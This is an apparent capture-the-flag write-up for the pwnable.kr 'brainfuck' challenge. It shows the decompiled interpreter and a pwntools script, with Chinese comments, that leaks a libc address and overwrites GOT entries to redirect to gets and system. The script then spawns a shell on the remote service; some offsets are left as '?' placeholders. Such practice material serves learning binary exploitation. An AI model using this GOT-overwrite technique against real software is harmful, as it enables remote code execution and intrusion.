pwnable.kr brainfuck writeup

0x01 Overview

‘’’
int __cdecl do_brainfuck(char a1)
{
int result; // eax
_BYTE *v2; // ebx

result = a1 - 43; // p = 0804A0A0
switch ( a1 )
{
case ‘+’:
result = p;
++*(_BYTE *)p; // (*p)++
break;
case ‘,’:
v2 = (_BYTE *)p;
result = getchar();
*v2 = result; // *(char )p = getchar()
break;
case ‘-‘:
result = p;
–(_BYTE *)p; // (p)–
break;
case ‘.’:
result = putchar((char *)p); // print char *p
break;
case ‘<’:
result = –p; // p=p-1
break;
case ‘>’:
result = ++p; // p=p+1
break;
case ‘[‘:
result = puts(“[ and ] not supported.”);
break;
default:
return result;
}
return result;
}
‘’’

0x02 exp

from pwn import *

# b初始值
b = 0x804A0A0

# putchar got 读 获取libc泄漏地址
putchar_got =  ?

# memset got  写入glibc gets的偏移地址
# gets(s)
memset_got = ?

# fgets got 写入glibc system的偏移地址
# system(s)
fgets_got = ?

# glibc put char addr ?
# glibc system addr ?
system_addr_to_putchar = ? - ?
gets_addr_to_putchar = ? - ?

# start address
start = 0x080484E0

# 0x01 创建连接
brainfuck = remote("pwnable.kr", 9001)
brainfuck.recvuntil(b']\n')

# 0x02 构造payload
# 第一个先发.的原因是延迟绑定
payload = b'.'+ \
    b'<'*(b-putchar_got) + b'.>'*4 + \
    b'<'*4 + b',>'*4 + b'<'*4 + \
    b'<'*(putchar_got-memset_got) + b',>'*4 + b'<'*4 + \
    b'<'*(memset_got-fgets_got) + b',>'*4 + b'<'*4 + b'.' 

# 0x03 读libc leak
brainfuck.sendline(payload)

what = brainfuck.recv(1)
print("what?: ", what)

base = brainfuck.recv(4)
putchar_addr = int.from_bytes(base, "little")
print("putchar got: ", base, " ", hex(putchar_addr))

# 0x04 替换putchar为_start
brainfuck.send(start.to_bytes(4, 'little'))

# 0x05 替换memset为gets 替换fgets为system
gets_addr = putchar_addr + gets_addr_to_putchar
print("gets got: ", hex(gets_addr))
brainfuck.send(gets_addr.to_bytes(4, 'little'))

system_addr = putchar_addr + system_addr_to_putchar
print("system got: ", hex(system_addr))
brainfuck.send(system_addr.to_bytes(4, 'little'))

# 0x06 发送gets字符串
brainfuck.send(b'/bin/sh\x00')

# 0x07 获得shell
brainfuck.interactive()